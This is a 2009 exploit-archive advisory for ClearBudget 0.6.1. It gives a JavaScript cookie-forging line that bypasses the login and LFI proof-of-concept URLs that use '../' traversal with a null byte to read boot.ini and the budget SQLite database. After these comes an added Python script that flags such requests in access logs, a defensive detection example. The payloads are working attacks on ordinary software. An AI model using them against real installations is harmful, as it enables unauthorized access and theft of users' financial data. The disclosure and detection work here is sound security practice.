ClearBudget 0.6.1 Insecure Cookie Handling / LFI Vulnerabilities

2009-02-05T00:00:00
ID 1337DAY-ID-4803
Type zdt
Reporter SirGod
Modified 2009-02-05T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
================================================================
ClearBudget 0.6.1 Insecure Cookie Handling / LFI Vulnerabilities
================================================================


#############################################################################################

[+] Dork : ClearBudget v0.6.1

[+] Homepage : http://clearbudget.douteaud.com/


[+] Insecure Cookie Handling

    PoC : javascript:document.cookie = "user=true; path=/";

    Live Demo : http://clearbudget.douteaud.com/demo/0-6-1/


[+] Local File Inclusion

   Example : http://127.0.0.1/path/index.php?action=[Local File]%00

   PoC : http://127.0.0.1/path/index.php?action=../../../../boot.ini%00

   PoC 2 : http://127.0.0.1/path/index.php?action=../db/budget.sqlite%00

#############################################################################################
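
Both LFI PoCs above leave a recognisable trace in web server logs: an `action` value containing `../` segments or a percent-encoded null byte. The following added example (not part of the original advisory) scans access-log lines for such requests; the log lines are constructed, and the character set allowed for legitimate `action` values is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request field of a combined-format access log: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: legitimate action values are short page names without separators.
SAFE_ACTION_RE = re.compile(r'[A-Za-z0-9_-]{1,64}')

# Constructed sample lines; "home" is a hypothetical legitimate action value.
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Feb/2009:10:00:01 +0000] "GET /path/index.php?action=home HTTP/1.1" 200 5120',
    '192.0.2.44 - - [05/Feb/2009:10:00:07 +0000] "GET /path/index.php?action=../../../../boot.ini%00 HTTP/1.1" 200 211',
    '192.0.2.44 - - [05/Feb/2009:10:00:09 +0000] "GET /path/index.php?action=../db/budget.sqlite%00 HTTP/1.1" 200 40960',
    '192.0.2.10 - - [05/Feb/2009:10:00:12 +0000] "GET /path/style.css HTTP/1.1" 200 900',
]

def classify_action(value):
    """Return the reasons a decoded action value looks like file inclusion."""
    reasons = []
    if "\x00" in value:
        reasons.append("null-byte")
    # Normalise backslashes so Windows-style traversal is caught as well.
    if ".." in value.replace("\\", "/").split("/"):
        reasons.append("traversal")
    if value and not reasons and not SAFE_ACTION_RE.fullmatch(value):
        reasons.append("unexpected-characters")
    return reasons

def scan(lines):
    """Yield (line_number, action_value, reasons) for suspicious requests."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        # parse_qsl percent-decodes once, so %00 arrives here as "\x00".
        for key, value in parse_qsl(query, keep_blank_values=True):
            if key == "action":
                reasons = classify_action(value)
                if reasons:
                    yield number, value, reasons

if __name__ == "__main__":
    for number, value, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: action={value!r} flagged: {', '.join(reasons)}")
```

A double-encoded null byte (`%2500`) decodes once to the literal text `%00`, which the character check still flags.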


